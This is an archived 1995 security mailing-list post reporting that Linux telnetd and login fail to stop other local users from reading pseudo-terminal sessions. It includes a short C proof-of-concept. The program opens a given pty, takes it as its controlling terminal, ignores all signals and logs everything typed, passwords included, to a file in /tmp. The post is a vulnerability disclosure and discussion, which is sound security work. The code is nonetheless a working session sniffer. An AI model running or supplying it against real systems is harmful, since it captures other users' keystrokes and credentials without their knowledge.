[prev in list] [next in list] [prev in thread] [next in thread]
List: best-of-security
Subject: BoS: linux tty surfing
From: Julian Assange <proff () suburbia ! net>
Date: 1995-09-26 13:07:49
[Download RAW message or body]
-----BEGIN PGP SIGNED MESSAGE-----
Hi all,
I've done some more testing on this, and got the following results
with 1.2.10 (yeah, I'm not really on the bleeding edge):
* telnetd as of NetKit-0.5 does not protect you from anyone
snooping on your pty. I guess we know that by now.
There's some code in sys_term.c that does a vhangup on the
pty, but it's commented out for Linux. The comment says that
this appears to be buggy
* Using login from util-linux-2.2 helps a bit. If you do a
cat /dev/ttyp0, it will terminate once login is executed by
telnetd. That's because login *does* do a vhangup.
* Unfortunately, this is not the end of it. I experimented
a little, and found that a program that ignores all signals
*and* makes the pty its controlling tty will happily live on,
and is still able to read data from it. I'm including it
below.
What I do not understand is why this does not make telnetd
fail when doing an ioctl(TIOCSCTTY). Anyone more familiar with
this stuff may be able to shed some light on this (Ted?).
Olaf
- --
Olaf Kirch | --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax
For my PGP public key, finger okir@brewhq.swb.de.
- ------------------------------------------------------------------
/*
* simple test program for. Not my usual standard of coding...
*/
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <termios.h>
#include <sys/types.h>
#include <sys/fcntl.h>
int
main(int argc, char **argv)
{
char buffer[256];
FILE *fp;
int fd, i, n;
for (i = 0; i < 256; i++)
close(i);
setsid();
if ((fd = open(argv[1], O_RDWR)) < 0) {
perror("open");
return 2;
}
if (ioctl(fd, TIOCSCTTY, NULL) < 0)
perror("ioctl");
if ((fp = fopen("/tmp/snarf", "w")) == NULL)
return 2;
for (i = 0; i < 32; i++)
signal(i, SIG_IGN);
while ((n = read(fd, buffer, 255)) > 0) {
buffer[n] = 0;
fprintf(fp, "got %s\n", buffer);
}
perror("read");
return 2;
}
--
did I say, "dumb."
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic